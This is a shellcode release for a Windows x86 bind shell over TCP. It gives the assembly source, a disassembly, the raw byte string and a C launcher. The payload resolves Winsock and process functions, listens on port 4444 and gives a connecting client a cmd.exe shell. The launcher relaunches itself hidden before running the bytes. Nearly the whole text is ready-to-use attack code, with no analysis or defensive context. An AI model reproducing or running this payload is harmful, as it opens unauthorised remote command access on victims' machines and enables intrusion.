/* # Title : Windows x86 bind shell tcp shellcode # Author : Roziul Hasan Khan Shifat # Date : 08-09-2016 # Tested On : Windows 7 Ultimate , Starter x86 */ //Note: This shellcode will only works on x86 /* section .text global _start _start: xor ecx,ecx mov eax,[fs:ecx+0x30] ;PEB mov eax,[eax+0xc] ;PEB.Ldr mov esi,[eax+0x14] ;PEB.Ldr->InMemOrderModuleList lodsd xchg esi,eax lodsd mov edi,[eax+0x10] ;kernel32.dll base address mov ebx,[edi+0x3c] ;DOS->elf_anew add ebx,edi ;PE HEADER mov ebx,[ebx+0x78] add ebx,edi ;kernel32 IMAGE_EXPORT_DIRECTORY sub esp,32 lea esi,[esp] mov cx,660 mov edx,[ebx+0x1c] ;AddressOfFunctions add edx,edi mov eax,[edx+ecx] add eax,edi mov [esi],dword eax ;CreateProcessA() at offset 0 mov cx,1128 mov eax,[edx+ecx] add eax,edi mov [esi+4],dword eax ;ExitProcess() at offset 4 ;------------------------------------ ;finding base address of ws2_32.dll mov cx,3312 mov eax,[edx+ecx] add eax,edi xor ecx,ecx push 0x41416c6c mov [esp+2],word cx push 0x642e3233 push 0x5f327377 lea ebx,[esp] push ebx call eax ;--------------------------- mov edi,eax ;--------------------- mov ebx,[edi+0x3c] ;DOS->elf_anew add ebx,edi ;PE HEADER mov ebx,[ebx+0x78] add ebx,edi ; ws2_32.dll IMAGE_EXPORT_DIRECTORY mov edx,[ebx+0x1c] ;AddressOfFunctions add edx,edi xor ecx,ecx mov cx,456 mov eax,[edx+ecx] add eax,edi mov [esi+8],dword eax ;WSAStartup() at offset 8 mov cx,392 mov eax,[edx+ecx] add eax,edi mov [esi+12],dword eax ;WSASocketA() at offset 12 mov eax,[edx+4] add eax,edi mov [esi+16],dword eax ;bind() at offset 16 mov eax,[edx+48] add eax,edi mov [esi+20],dword eax ;listen() at offset 20 mov eax,[edx] add eax,edi mov [esi+24],dword eax ;accept() at offset 24 mov eax,[edx+80] add eax,edi mov [esi+28],dword eax ;setsockopt() at offset 28 ;------------------------------------------------- ;WSAStartup(514, &WSADATA) mov cx,400 sub esp,ecx lea ebx,[esp] mov cx,514 push ebx push ecx call dword [esi+8] ;----------------------------------------- ;WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,NULL,NULL) xor ecx,ecx push ecx push ecx push ecx mov cl,6 push ecx sub ecx,5 push ecx inc ecx push ecx call dword [esi+12] ;---------------------------- mov edi,eax ;SOCKET ;---------------------------------- ;setsockopt(sock,0xffff,4,&int l=1,int j=2) cdq mov dl,2 push edx dec edx push edx lea ecx,[esp] mov dl,4 push ecx push edx mov dx,0xffff push edx push edi call dword [esi+28] ;-------------------------------------------- ;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16); cdq push edx push edx push edx push edx mov [esp],byte 2 mov [esp+2],word 0x5c11 ;port 4444 lea ecx,[esp] mov dl,16 push edx push ecx push edi call dword [esi+16] ;-------------------------------- ;listen(SOCKET,1); cdq inc edx push edx push edi call dword [esi+20] ;----------------------------- ;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,&16); cdq push edx push edx push edx push edx mov dl,16 lea ecx,[esp] push edx lea ebx,[esp] push ebx push ecx push edi call dword [esi+24] ;----------------------- mov edi,eax ;CLIent socket ;----------------------- cdq sub esp,16 lea ebx,[esp] ;PROCESS_INFORMATION push edi push edi push edi push edx push edx mov dl,255 inc edx push edx cdq push edx push edx push edx push edx push edx push edx push edx push edx push edx push edx mov dl,68 push edx lea ecx,[esp] ;STARTUPINFOA cdq push 0x41657865 mov [esp+3],byte dl push 0x2e646d63 lea eax,[esp] ;--------------------------------------------- ;CreateProcessA(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&STARTUPINFOA,&PROCESS_INFORMATION) push ebx push ecx push edx push edx push edx inc edx push edx cdq push edx push edx push eax push edx call dword [esi] ;----------------------- push eax call dword [esi+4] */ /* Disassembly of section .text: 00000000 <_start>: 0: 31 c9 xor %ecx,%ecx 2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax 6: 8b 40 0c mov 0xc(%eax),%eax 9: 8b 70 14 mov 0x14(%eax),%esi c: ad lods %ds:(%esi),%eax d: 96 xchg %eax,%esi e: ad lods %ds:(%esi),%eax f: 8b 78 10 mov 0x10(%eax),%edi 12: 8b 5f 3c mov 0x3c(%edi),%ebx 15: 01 fb add %edi,%ebx 17: 8b 5b 78 mov 0x78(%ebx),%ebx 1a: 01 fb add %edi,%ebx 1c: 83 ec 20 sub $0x20,%esp 1f: 8d 34 24 lea (%esp),%esi 22: 66 b9 94 02 mov $0x294,%cx 26: 8b 53 1c mov 0x1c(%ebx),%edx 29: 01 fa add %edi,%edx 2b: 8b 04 0a mov (%edx,%ecx,1),%eax 2e: 01 f8 add %edi,%eax 30: 89 06 mov %eax,(%esi) 32: 66 b9 68 04 mov $0x468,%cx 36: 8b 04 0a mov (%edx,%ecx,1),%eax 39: 01 f8 add %edi,%eax 3b: 89 46 04 mov %eax,0x4(%esi) 3e: 66 b9 f0 0c mov $0xcf0,%cx 42: 8b 04 0a mov (%edx,%ecx,1),%eax 45: 01 f8 add %edi,%eax 47: 31 c9 xor %ecx,%ecx 49: 68 6c 6c 41 41 push $0x41416c6c 4e: 66 89 4c 24 02 mov %cx,0x2(%esp) 53: 68 33 32 2e 64 push $0x642e3233 58: 68 77 73 32 5f push $0x5f327377 5d: 8d 1c 24 lea (%esp),%ebx 60: 53 push %ebx 61: ff d0 call *%eax 63: 89 c7 mov %eax,%edi 65: 8b 5f 3c mov 0x3c(%edi),%ebx 68: 01 fb add %edi,%ebx 6a: 8b 5b 78 mov 0x78(%ebx),%ebx 6d: 01 fb add %edi,%ebx 6f: 8b 53 1c mov 0x1c(%ebx),%edx 72: 01 fa add %edi,%edx 74: 31 c9 xor %ecx,%ecx 76: 66 b9 c8 01 mov $0x1c8,%cx 7a: 8b 04 0a mov (%edx,%ecx,1),%eax 7d: 01 f8 add %edi,%eax 7f: 89 46 08 mov %eax,0x8(%esi) 82: 66 b9 88 01 mov $0x188,%cx 86: 8b 04 0a mov (%edx,%ecx,1),%eax 89: 01 f8 add %edi,%eax 8b: 89 46 0c mov %eax,0xc(%esi) 8e: 8b 42 04 mov 0x4(%edx),%eax 91: 01 f8 add %edi,%eax 93: 89 46 10 mov %eax,0x10(%esi) 96: 8b 42 30 mov 0x30(%edx),%eax 99: 01 f8 add %edi,%eax 9b: 89 46 14 mov %eax,0x14(%esi) 9e: 8b 02 mov (%edx),%eax a0: 01 f8 add %edi,%eax a2: 89 46 18 mov %eax,0x18(%esi) a5: 8b 42 50 mov 0x50(%edx),%eax a8: 01 f8 add %edi,%eax aa: 89 46 1c mov %eax,0x1c(%esi) ad: 66 b9 90 01 mov $0x190,%cx b1: 29 cc sub %ecx,%esp b3: 8d 1c 24 lea (%esp),%ebx b6: 66 b9 02 02 mov $0x202,%cx ba: 53 push %ebx bb: 51 push %ecx bc: ff 56 08 call *0x8(%esi) bf: 31 c9 xor %ecx,%ecx c1: 51 push %ecx c2: 51 push %ecx c3: 51 push %ecx c4: b1 06 mov $0x6,%cl c6: 51 push %ecx c7: 83 e9 05 sub $0x5,%ecx ca: 51 push %ecx cb: 41 inc %ecx cc: 51 push %ecx cd: ff 56 0c call *0xc(%esi) d0: 89 c7 mov %eax,%edi d2: 99 cltd d3: b2 02 mov $0x2,%dl d5: 52 push %edx d6: 4a dec %edx d7: 52 push %edx d8: 8d 0c 24 lea (%esp),%ecx db: b2 04 mov $0x4,%dl dd: 51 push %ecx de: 52 push %edx df: 66 ba ff ff mov $0xffff,%dx e3: 52 push %edx e4: 57 push %edi e5: ff 56 1c call *0x1c(%esi) e8: 99 cltd e9: 52 push %edx ea: 52 push %edx eb: 52 push %edx ec: 52 push %edx ed: c6 04 24 02 movb $0x2,(%esp) f1: 66 c7 44 24 02 11 5c movw $0x5c11,0x2(%esp) f8: 8d 0c 24 lea (%esp),%ecx fb: b2 10 mov $0x10,%dl fd: 52 push %edx fe: 51 push %ecx ff: 57 push %edi 100: ff 56 10 call *0x10(%esi) 103: 99 cltd 104: 42 inc %edx 105: 52 push %edx 106: 57 push %edi 107: ff 56 14 call *0x14(%esi) 10a: 99 cltd 10b: 52 push %edx 10c: 52 push %edx 10d: 52 push %edx 10e: 52 push %edx 10f: b2 10 mov $0x10,%dl 111: 8d 0c 24 lea (%esp),%ecx 114: 52 push %edx 115: 8d 1c 24 lea (%esp),%ebx 118: 53 push %ebx 119: 51 push %ecx 11a: 57 push %edi 11b: ff 56 18 call *0x18(%esi) 11e: 89 c7 mov %eax,%edi 120: 99 cltd 121: 83 ec 10 sub $0x10,%esp 124: 8d 1c 24 lea (%esp),%ebx 127: 57 push %edi 128: 57 push %edi 129: 57 push %edi 12a: 52 push %edx 12b: 52 push %edx 12c: b2 ff mov $0xff,%dl 12e: 42 inc %edx 12f: 52 push %edx 130: 99 cltd 131: 52 push %edx 132: 52 push %edx 133: 52 push %edx 134: 52 push %edx 135: 52 push %edx 136: 52 push %edx 137: 52 push %edx 138: 52 push %edx 139: 52 push %edx 13a: 52 push %edx 13b: b2 44 mov $0x44,%dl 13d: 52 push %edx 13e: 8d 0c 24 lea (%esp),%ecx 141: 99 cltd 142: 68 65 78 65 41 push $0x41657865 147: 88 54 24 03 mov %dl,0x3(%esp) 14b: 68 63 6d 64 2e push $0x2e646d63 150: 8d 04 24 lea (%esp),%eax 153: 53 push %ebx 154: 51 push %ecx 155: 52 push %edx 156: 52 push %edx 157: 52 push %edx 158: 42 inc %edx 159: 52 push %edx 15a: 99 cltd 15b: 52 push %edx 15c: 52 push %edx 15d: 50 push %eax 15e: 52 push %edx 15f: ff 16 call *(%esi) 161: 50 push %eax 162: ff 56 04 call *0x4(%esi) */ #include #include #include #include char shellcode[]=\ "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x78\x10\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x83\xec\x20\x8d\x34\x24\x66\xb9\x94\x02\x8b\x53\x1c\x01\xfa\x8b\x04\x0a\x01\xf8\x89\x06\x66\xb9\x68\x04\x8b\x04\x0a\x01\xf8\x89\x46\x04\x66\xb9\xf0\x0c\x8b\x04\x0a\x01\xf8\x31\xc9\x68\x6c\x6c\x41\x41\x66\x89\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x8d\x1c\x24\x53\xff\xd0\x89\xc7\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x8b\x53\x1c\x01\xfa\x31\xc9\x66\xb9\xc8\x01\x8b\x04\x0a\x01\xf8\x89\x46\x08\x66\xb9\x88\x01\x8b\x04\x0a\x01\xf8\x89\x46\x0c\x8b\x42\x04\x01\xf8\x89\x46\x10\x8b\x42\x30\x01\xf8\x89\x46\x14\x8b\x02\x01\xf8\x89\x46\x18\x8b\x42\x50\x01\xf8\x89\x46\x1c\x66\xb9\x90\x01\x29\xcc\x8d\x1c\x24\x66\xb9\x02\x02\x53\x51\xff\x56\x08\x31\xc9\x51\x51\x51\xb1\x06\x51\x83\xe9\x05\x51\x41\x51\xff\x56\x0c\x89\xc7\x99\xb2\x02\x52\x4a\x52\x8d\x0c\x24\xb2\x04\x51\x52\x66\xba\xff\xff\x52\x57\xff\x56\x1c\x99\x52\x52\x52\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\x8d\x0c\x24\xb2\x10\x52\x51\x57\xff\x56\x10\x99\x42\x52\x57\xff\x56\x14\x99\x52\x52\x52\x52\xb2\x10\x8d\x0c\x24\x52\x8d\x1c\x24\x53\x51\x57\xff\x56\x18\x89\xc7\x99\x83\xec\x10\x8d\x1c\x24\x57\x57\x57\x52\x52\xb2\xff\x42\x52\x99\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52\xb2\x44\x52\x8d\x0c\x24\x99\x68\x65\x78\x65\x41\x88\x54\x24\x03\x68\x63\x6d\x64\x2e\x8d\x04\x24\x53\x51\x52\x52\x52\x42\x52\x99\x52\x52\x50\x52\xff\x16\x50\xff\x56\x04"; int main(int i,char *a[]) { int mode; if(i==1) mode=1; else mode=atoi(a[1]); switch(mode) { case 1: ShellExecute(NULL,NULL,a[0],"78",NULL,0); break; case 78: (* (int(*)())shellcode )(); break; default: break; } return 0; }